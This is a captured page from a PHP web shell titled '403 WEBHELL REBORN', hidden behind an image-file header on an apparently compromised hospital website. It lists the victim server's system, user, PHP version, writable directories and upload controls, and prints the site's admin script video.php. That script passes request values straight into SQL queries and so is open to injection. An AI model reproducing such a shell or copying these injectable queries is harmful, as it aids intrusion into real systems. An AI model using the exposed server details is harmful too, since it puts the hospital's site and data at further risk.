ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/////adminvn/video.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
include('../#includes/config.php');
if(check_log() == true && check_level() >= 4) {

    if($_GET['type'] == 'add' & strlen($_POST['name']) >= 3 && strlen($_POST['url']) > 5){
        $_SESSION['sub_video'] = $_POST['catsub'];
        if ($_POST['order'] != '1'){$_SESSION['video_order'] = $_POST['order'] + '1';} else {$_SESSION['video_order'] = '2';}
        @mysql_query("INSERT INTO cily_videos (video_name, video_name_ascii, video_url, video_content, video_cat, video_order, video_time) VALUES ('".addsla($_POST['name'])."', '".ascii($_POST['name'])."', '".$_POST['url']."', '".addsla($_POST['content'])."', '".$_POST['catsub']."', '".$_POST['order']."','" . time() . "')");
        header('Location: index.php?m=10&sm=3');
    }
    
    elseif($_GET['type'] == 'edit'){
        @mysql_query("UPDATE cily_videos SET video_name = '".addsla($_POST['name'])."', video_name_ascii = '".ascii($_POST['name'])."', video_url = '".$_POST['url']."', video_content = '".addsla($_POST['content'])."', video_order = '".$_POST['order']."', video_cat = '".$_POST['catsub']."' WHERE id = ".$_POST['id']);
        header('Location: index.php?m=10&sm=3');
    }

    elseif($_GET['type'] == 'hot'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
        @mysql_query("UPDATE cily_videos SET video_hot = '".$getoc."' WHERE id = ".$getid);
        Redirect("","index.php?m=10&sm=3");
    }
    
    elseif($_GET['type'] == 'del' && $_POST['action'] == 1 && $_POST['id']){
        $total = count($_POST['id']);
        for($i=0; $i<$total; $i++) {
            @mysql_query("DELETE FROM cily_videos WHERE id = ".$_POST['id'][$i]);
        }
        header('Location: index.php?m=10&sm=3');
    }
    elseif($_GET['type'] == 'del' && $_POST['action'] == 2){
        $idm = $_POST["rowid"];
    $sttm = $_POST["idorder"];
    $lap=count($idm);
    for($i=0; $i<$lap; $i++) {
            @mysql_query("UPDATE cily_videos SET video_order = ".$sttm[$i]." WHERE id = ".$idm[$i]);
    }
        Redirect("","index.php?m=10&sm=3");
    }
    
    elseif($_GET['type'] == 'state'){
        $getid = $_GET['id'];
        $getoc = $_GET['oc'];
    @mysql_query("UPDATE cily_videos SET video_home = '".$getoc."' WHERE id = ".$getid);
         
        Redirect("","index.php?m=10&sm=3");
    }
    
    else header('Location: index.php?m=10&sm=3');
}

else echo "Hacking attempt";


?>

Anon7 - 2021